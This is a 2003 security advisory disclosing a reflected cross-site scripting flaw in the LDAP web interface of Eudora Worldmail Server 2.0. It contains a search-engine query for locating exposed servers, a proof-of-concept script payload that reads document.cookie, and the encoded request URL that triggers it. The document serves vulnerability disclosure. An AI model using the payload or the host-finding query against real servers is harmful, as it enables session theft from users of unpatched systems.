------------------------------------------------------------------
          - EXPL-A-2003-020 exploitlabs.com Advisory 020
------------------------------------------------------------------
                -= Eudora Worldmail Server 2.0 =-





Donnie Werner
Aug 9, 2003


Product:
--------
Eudora Worldmail Server 2.0


http://www.qualcomm.com/
http://www.eudora.com/worldmail/



Vunerability(s):
----------------
1. XSS injection


Description of product:
-----------------------
http://www.eudora.com/worldmail/features.html


Banner id:

HTTP/1.0 200 Document follows
Server: ISOCOR web500gw 2.0.0.3
MIME-Version: 1.0
Date: Wednesday, 06-Aug-2003  GMT
Content-type: text/html


examples could be found by:

http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&safe=off&q=Qpam.htm&btnG=Google+Search




VUNERABILITY / EXPLOIT
======================


Vunerable hosts display the following:

-------------- snip ----------------------


A convenient hypertext interface to LDAP and X.500 Directories.


Local domains and aliases

Results for: entries at the top level


 Name Description 
Countries 
 AE   <---------------- example country
 IT
 CA  
--------------- snip --------------------

Select a country ( "AE" used as example )
you should see something like the following..

http://[host]:8888/c%3dAE

and a search box

"One-level search in AE:"

<FORM METHOD=GET ACTION="/c%3dAE">
<A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
<INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
<INPUT TYPE=reset VALUE="Clear"></FORM>

enter sum cool XSS...

<SCRIPT>alert(document.cookie);</SCRIPT>


and  get

http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E


the results are rendered by the output of the formatted html.

yes, it just a non persistant XSS, but this is running as a service on
port 8888 and is a mail processing server, so there may be other issues
( DoS ? ) as well. 



I belive LDAP has some DCOM connectivity as well, and there could be issies with the LDAP...

SLAPD or X.500 Error: Not found
An error occurred while searching the SLAPD or X.500 directory
The error code was 32: 

No such object.
No additional information is available.Please report errors to the Administrator.



Local:
------
???

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day



Vendor Contact:
---------------
Concurrent with this advisory
eudora-custserv@qualcomm.com 

Credits:
--------

Donnie Werner
morning_wood@e2-labs.com
http://e2-labs.com

Original may be found at http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-server-pre.txt